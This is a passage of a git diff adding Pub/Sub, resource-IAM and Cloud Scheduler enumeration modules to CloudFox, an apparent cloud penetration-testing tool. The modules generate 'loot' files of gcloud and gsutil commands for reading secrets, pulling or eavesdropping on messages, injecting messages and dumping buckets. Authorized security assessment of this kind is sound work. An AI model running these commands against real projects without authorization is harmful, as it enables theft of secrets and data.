bucket: %s + +# List exported message files +gsutil ls -la gs://%s/ + +# Download all exported messages +gsutil -m cp -r gs://%s/ ./exported_messages/ + +# Stream new exports as they arrive +# gsutil -m rsync -r gs://%s/ ./exported_messages/ + +`, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + ) + } + + // Dead letter topic attacks + if sub.DeadLetterTopic != "" { + lootFile.Contents += fmt.Sprintf(`# === DEAD LETTER TOPIC ATTACKS === + +# Dead letter topic: %s +# Messages that fail delivery %d times go here + +# Create subscription to dead letter topic to capture failed messages +# gcloud pubsub subscriptions create dlq-eavesdrop --topic=%s --project=%s + +# Dead letters often contain sensitive data from failed processing + +`, + sub.DeadLetterTopic, sub.MaxDeliveryAttempts, + sub.DeadLetterTopic, sub.ProjectID, + ) + } + + // Cross-project attack scenarios + if 
sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + lootFile.Contents += fmt.Sprintf(`# === CROSS-PROJECT ATTACK SCENARIOS === + +# This subscription reads from topic in project: %s +# This indicates a trust relationship between projects + +# Check if you have access to the source topic +gcloud pubsub topics describe %s --project=%s + +# If you can publish to the source topic, you can inject messages +# gcloud pubsub topics publish %s --message='injected' --project=%s + +`, + sub.TopicProject, + sub.Topic, sub.TopicProject, + sub.Topic, sub.TopicProject, + ) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PubSubModule) getTopicsHeader() []string { + return []string{ + "Project", + "Topic", + "Subscriptions", + "Schema", + "KMS Key", + "Retention", + "Public Publish", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *PubSubModule) getSubsHeader() []string { + return []string{ + "Project", + "Subscription", + "Topic", + "Topic Project", + "Type", + "Destination", + "Filter", + "Ack Deadline", + "Retention", + "Dead Letter", + "Public Subscribe", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *PubSubModule) topicsToTableBody(topics []PubSubService.TopicInfo) [][]string { + var body [][]string + for _, topic := range topics { + schema := "-" + if topic.SchemaSettings != "" { + schema = topic.SchemaSettings + } + + kmsKey := "-" + if topic.KmsKeyName != "" { + // Extract just the key name from full path for readability + parts := strings.Split(topic.KmsKeyName, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } else { + kmsKey = topic.KmsKeyName + } + } + + retention := "-" + if 
topic.MessageRetentionDuration != "" { + retention = topic.MessageRetentionDuration + } + + // Check for public publish access + publicPublish := "No" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows publishing + if strings.Contains(binding.Role, "publisher") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" { + publicPublish = "Yes" + break + } + } + } + + if len(topic.IAMBindings) > 0 { + for _, binding := range topic.IAMBindings { + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + "-", + "-", + }) + } + } + return body +} + +func (m *PubSubModule) subsToTableBody(subs []PubSubService.SubscriptionInfo) [][]string { + var body [][]string + for _, sub := range subs { + subType := "Pull" + destination := "-" + if sub.PushEndpoint != "" { + subType = "Push" + destination = sub.PushEndpoint + } else if sub.BigQueryTable != "" { + subType = "BigQuery" + destination = sub.BigQueryTable + } else if sub.CloudStorageBucket != "" { + subType = "GCS" + destination = sub.CloudStorageBucket + } + + topicProject := "-" + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + topicProject = sub.TopicProject + } + + filter := "-" + if sub.Filter != "" { + filter = sub.Filter + } + + ackDeadline := "-" + if sub.AckDeadlineSeconds > 0 { + ackDeadline = fmt.Sprintf("%ds", sub.AckDeadlineSeconds) + } + + retention := "-" + if sub.MessageRetention != "" { + retention = sub.MessageRetention + } + + deadLetter := "-" + if sub.DeadLetterTopic 
!= "" { + deadLetter = sub.DeadLetterTopic + } + + // Check for public subscribe access + publicSubscribe := "No" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows subscribing/consuming + if strings.Contains(binding.Role, "subscriber") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/pubsub.viewer" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" || + binding.Role == "roles/viewer" { + publicSubscribe = "Yes" + break + } + } + } + + if len(sub.IAMBindings) > 0 { + for _, binding := range sub.IAMBindings { + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + "-", + "-", + }) + } + } + return body +} + +func (m *PubSubModule) buildTablesForProject(projectID string) []internal.TableFile { + topics := m.ProjectTopics[projectID] + subs := m.ProjectSubscriptions[projectID] + + topicsBody := m.topicsToTableBody(topics) + subsBody := m.subsToTableBody(subs) + + var tableFiles []internal.TableFile + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, + }) + } + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, + }) + } + return tableFiles +} + +func (m *PubSubModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := 
internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectTopics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubscriptions { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = PubSubOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PubSubModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + + topicsBody := m.topicsToTableBody(allTopics) + subsBody := m.subsToTableBody(allSubs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, + }) + } + if 
len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, + }) + } + + output := PubSubOutput{Table: tableFiles, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + + diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go new file mode 100644 index 00000000..fd4c27fd --- /dev/null +++ b/gcp/commands/resourceiam.go @@ -0,0 +1,602 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + resourceiamservice "github.com/BishopFox/cloudfox/gcp/services/resourceIAMService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPResourceIAMCommand = &cobra.Command{ + Use: globals.GCP_RESOURCEIAM_MODULE_NAME, + Aliases: []string{"resiam", "resource-policies"}, + Short: "Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.)", + Long: `Enumerate IAM policies attached directly to GCP resources. + +This module discovers WHO has access to WHAT resources by enumerating +resource-level IAM policies (not just project-level policies). 
+ +Supported Resource Types: +- Cloud Storage buckets +- BigQuery datasets +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Cloud KMS keys +- Cloud Functions +- Cloud Run services + +Key Findings: +- Public access (allUsers/allAuthenticatedUsers) +- Cross-project access patterns +- Overly permissive roles on sensitive resources +- Federated identity access to resources`, + Run: runGCPResourceIAMCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceIAMModule struct { + gcpinternal.BaseGCPModule + + ProjectBindings map[string][]resourceiamservice.ResourceIAMBinding + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceIAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceIAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceIAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_RESOURCEIAM_MODULE_NAME) + if err != nil { + return + } + + module := &ResourceIAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBindings: make(map[string][]resourceiamservice.ResourceIAMBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating resource-level IAM policies...", globals.GCP_RESOURCEIAM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, 
m.processProject) + + allBindings := m.getAllBindings() + if len(allBindings) == 0 { + logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) + return + } + + // Count statistics + publicCount := 0 + resourceTypes := make(map[string]int) + for _, b := range allBindings { + resourceTypes[b.ResourceType]++ + if b.IsPublic { + publicCount++ + } + } + + // Build summary + var typeSummary []string + for rt, count := range resourceTypes { + typeSummary = append(typeSummary, fmt.Sprintf("%d %s(s)", count, rt)) + } + + logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", + len(allBindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.mu.Unlock() + + svc := resourceiamservice.New() + bindings, err := svc.GetAllResourceIAM(ctx, projectID) + if err != nil { + 
m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_RESOURCEIAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate resource IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectBindings[projectID] = append(m.ProjectBindings[projectID], bindings...) + + // Generate loot for all resources + for _, b := range bindings { + m.addResourceToLoot(b, projectID) + if b.IsPublic { + m.addPublicResourceToLoot(b, projectID) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d resource IAM binding(s) in project %s", len(bindings), projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } +} + +// getAllBindings aggregates all bindings across projects +func (m *ResourceIAMModule) getAllBindings() []resourceiamservice.ResourceIAMBinding { + var allBindings []resourceiamservice.ResourceIAMBinding + for _, bindings := range m.ProjectBindings { + allBindings = append(allBindings, bindings...) + } + return allBindings +} + +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) addResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + lootFile := m.LootMap[projectID]["resource-iam-commands"] + if lootFile == nil { + return + } + + // Generate enumeration and exploit commands based on resource type + switch b.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf( + "# Bucket: %s (Member: %s, Role: %s)\n"+ + "gsutil iam get %s\n"+ + "gsutil ls %s\n"+ + "gsutil ls -L %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, b.ResourceName, + ) + case "dataset": + lootFile.Contents += fmt.Sprintf( + "# BigQuery Dataset: %s (Member: %s, Role: %s)\n"+ + "bq show --format=prettyjson %s\n"+ + "bq ls %s\n"+ + "bq query --use_legacy_sql=false 'SELECT table_name FROM `%s`.INFORMATION_SCHEMA.TABLES'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, 
b.ResourceID, + ) + case "topic": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Topic: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub topics describe %s --project=%s\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n"+ + "# Create a subscription to read messages:\n"+ + "gcloud pubsub subscriptions create cloudfox-tap-%s --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull cloudfox-tap-%s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "subscription": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Subscription: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n"+ + "# Pull messages from subscription:\n"+ + "gcloud pubsub subscriptions pull %s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "secret": + lootFile.Contents += fmt.Sprintf( + "# Secret Manager Secret: %s (Member: %s, Role: %s)\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cryptokey": + lootFile.Contents += fmt.Sprintf( + "# KMS CryptoKey: %s (Member: %s, Role: %s)\n"+ + "gcloud kms keys describe %s --format=json\n"+ + "gcloud kms keys get-iam-policy %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, + ) + case "function": + lootFile.Contents += fmt.Sprintf( + "# Cloud Function: %s (Member: %s, Role: %s)\n"+ + "gcloud functions describe %s --project=%s\n"+ + "gcloud functions get-iam-policy %s 
--project=%s\n"+ + "# Invoke function (if invoker role):\n"+ + "gcloud functions call %s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + lootFile.Contents += fmt.Sprintf( + "# Cloud Run Service: %s (Member: %s, Role: %s)\n"+ + "gcloud run services describe %s --project=%s --format=json\n"+ + "gcloud run services get-iam-policy %s --project=%s\n"+ + "# Get service URL and test access:\n"+ + "gcloud run services describe %s --project=%s --format='value(status.url)'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + } +} + +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + lootFile := m.LootMap[projectID]["public-resources"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# %s: %s\n# Member: %s, Role: %s\n", + b.ResourceType, b.ResourceName, b.Member, b.Role, + ) + + // Add exploitation commands based on resource type + switch b.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf( + "gsutil ls %s\ngsutil cat %s/*\n\n", + b.ResourceName, b.ResourceName, + ) + case "function": + lootFile.Contents += fmt.Sprintf( + "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + lootFile.Contents += fmt.Sprintf( + "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + } +} + +// resourceKey creates a unique key for a resource to group bindings +func resourceKey(b resourceiamservice.ResourceIAMBinding) string { + return fmt.Sprintf("%s|%s|%s", b.ProjectID, b.ResourceType, b.ResourceName) +} + +// shortenRole extracts a readable role name from the full role path +func shortenRole(role string) string { + // 
roles/storage.objectViewer -> objectViewer + // projects/xxx/roles/customRole -> customRole + if idx := strings.LastIndex(role, "/"); idx != -1 { + return role[idx+1:] + } + return role +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ResourceIAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, bindings := range m.ProjectBindings { + header := []string{ + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + groupBindings := resourceBindings[key] + if len(groupBindings) == 0 { + continue + } + + // Use first binding for resource info + first := groupBindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range groupBindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range groupBindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := 
strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + projectLevelData[projectID] = ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *ResourceIAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allBindings := m.getAllBindings() + + header := []string{ + "Project ID", + 
"Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range allBindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + bindings := resourceBindings[key] + if len(bindings) == 0 { + continue + } + + // Use first binding for resource info + first := bindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range bindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range bindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ProjectID, + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + 
strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + output := ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + []string{}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go new file mode 100644 index 00000000..0d4c47f7 --- /dev/null +++ b/gcp/commands/scheduler.go @@ -0,0 +1,427 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSchedulerCommand = &cobra.Command{ + Use: globals.GCP_SCHEDULER_MODULE_NAME, + Aliases: []string{"cron", "jobs"}, + Short: "Enumerate Cloud Scheduler jobs with security analysis", + Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details. 
+ +Features: +- Lists all Cloud Scheduler jobs +- Shows target configuration (HTTP, Pub/Sub, App Engine) +- Identifies service accounts used for authentication +- Shows schedule (cron) expressions +- Displays job state and last execution status +- Generates gcloud commands for job manipulation + +Security Columns: +- Target: HTTP endpoint, Pub/Sub topic, or App Engine service +- ServiceAccount: Identity used when invoking targets +- Schedule: When the job runs (cron expression) +- State: ENABLED, PAUSED, or DISABLED + +Attack Surface: +- HTTP targets may call internal or external endpoints +- Service accounts may have excessive permissions +- Jobs can be modified to call attacker-controlled endpoints +- Paused jobs may indicate suspended malicious activity`, + Run: runGCPSchedulerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SchedulerModule struct { + gcpinternal.BaseGCPModule + + ProjectJobs map[string][]SchedulerService.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SchedulerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SchedulerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME) + if err != nil { + return + } + + module := &SchedulerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectJobs: make(map[string][]SchedulerService.JobInfo), + LootMap: 
make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) + + allJobs := m.getAllJobs() + if len(allJobs) == 0 { + logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) + return + } + + // Count job states + enabledCount := 0 + httpCount := 0 + for _, job := range allJobs { + if job.State == "ENABLED" { + enabledCount++ + } + if job.TargetType == "http" { + httpCount++ + } + } + + msg := fmt.Sprintf("Found %d job(s)", len(allJobs)) + if enabledCount > 0 { + msg += fmt.Sprintf(" [%d enabled]", enabledCount) + } + if httpCount > 0 { + msg += fmt.Sprintf(" [%d HTTP targets]", httpCount) + } + logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllJobs returns all jobs from all projects +func (m *SchedulerModule) getAllJobs() []SchedulerService.JobInfo { + var all []SchedulerService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } + + ss := SchedulerService.New() + + jobs, err := ss.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + } + + for _, job := range jobs { + m.addJobToLoot(projectID, job) + } + m.mu.Unlock() + + if 